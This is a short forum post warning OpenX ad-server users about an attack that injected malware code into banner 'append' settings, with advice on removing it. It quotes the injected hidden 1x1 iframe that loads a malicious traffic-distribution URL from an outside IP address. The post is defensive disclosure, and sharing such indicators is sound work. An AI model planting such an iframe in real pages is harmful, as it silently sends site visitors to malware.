[AshSimmonds]

Just a quick note for any folks running a site and using the OpenX banner ad serving software, this morning AE was hit by an attack where an IFRAME was embedded within the banner script which requests data from a malware site.

In our case the actual link was:

Code: [Select]

<iframe src="http://194.8.250.219/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>
...which for some reason is a Google server, so if you are logged into your Google account, Google's break out of frames script would redirect you back to Google homepage.

The IP inserted is different on many other people's servers, you can find them by Googling OpenX tds/in.cgi.

The basics are that the malware iframe code was injected into the MySQL database somehow into the "Append and prepend settings" in OpenX where it tells the server to "Always append the following HTML code to banners displayed by this zone".

Just remove that append code and it's fixed - but it will be annoying if you're running dozens of banners, lucky for me we don't have many advertisers yet. 

I think I'll be using this opportunity to move away from OpenX, anyone tried Google Ad Manager/DoubleClick for Publishers?

Here's an example of what it looks like in the admin part of the banner, and where the code has been injected: